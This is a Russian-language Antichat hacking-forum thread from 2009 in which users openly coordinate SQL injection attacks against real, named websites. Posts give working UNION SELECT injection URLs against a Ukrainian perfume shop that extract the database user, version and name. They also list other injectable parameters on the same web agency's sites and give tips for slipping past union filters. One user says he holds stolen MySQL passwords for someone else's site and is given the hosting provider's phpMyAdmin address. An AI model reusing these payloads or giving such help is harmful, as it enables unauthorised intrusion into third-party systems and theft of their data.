Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

21.03.2009, 01:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
mysql
MySQL Support enabled
Active Persistent Links 0
Active Links 0
Client API version 5.0.67
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /tmp/mysql.sock
MYSQL_INCLUDE -I/usr/local/include/mysql
MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclient
С этого ничего. Что за инфо.пхп?
|
|
|

21.03.2009, 01:42
|
|
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме: 1031617
Репутация:
128
|
|
Сообщение от mailbrush
С этого ничего. Что за инфо.пхп?
http://gcmpp.ru/info.php
|
|
|

21.03.2009, 05:02
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме: 227123
Репутация:
122
|
|
а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5
|
|
|

21.03.2009, 05:55
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Сообщение от TELO
а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5
Дальше только перебор ибо 4 ветка без доступа к mysql и как правило file_priv в N:
http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(concat_ws(0x3A,u ser(),@@version,database())))
|
|
|

21.03.2009, 06:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от TELO
а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5
http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(version()))-- почему в unhex(hex(version()))? Потому что, когда мы ставим просто version() вылетает ошибка. Будем кодировать) Версия 4, т.е. таблицы через information_schema найти не получится =( Проверим file_priv, стандартные таблицы... Ничего не нашел =( Даже побрутил и ничего не вышло( Но зато это агенство всем наклепало свои уязвимые движки =) Смотрит сайты тут: http://www.web-sites.kiev.ua/portfolio.php Ошибки тут: index.php?act=goods&id=7'&gid=11
index.php?act=page&p=2'
Если найти таблицы, то можно писать сплоит)
P.S: А я вот решил глянуть мой именно домен) http://tigger.com/inspirations/install.php?error=true - вот итог =) Хм... Я так понимаю, что это /install/ но почему-то дальше не хочет =( может есть вариант какой-нибудь)?
Последний раз редактировалось Tigger; 21.03.2009 в 07:19..
|
|
|

21.03.2009, 09:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Radiator, сплоит ищи под ядро.
|
|
|

21.03.2009, 12:08
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме: 1385078
Репутация:
126
|
|
сегодня столкнулся с такой проблемой:
через group by определил кол колонок...
а когда уже пишут +union+select.....
слово union заменяется на "тра та та"
как эту хрень обойти?
|
|
|

21.03.2009, 12:14
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
попробуй регистр букв менять, например UniOn UNiON, а если там нормальная фильтрация, то болт и тебе придётся использовать блайнд-скул.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

21.03.2009, 13:10
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.
|
|
|

21.03.2009, 13:15
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
Провел на форуме: 812087
Репутация:
129
|
|
Сообщение от Byrger
Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.
http://mysql.infobox.ru/ - вот лови адрес 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|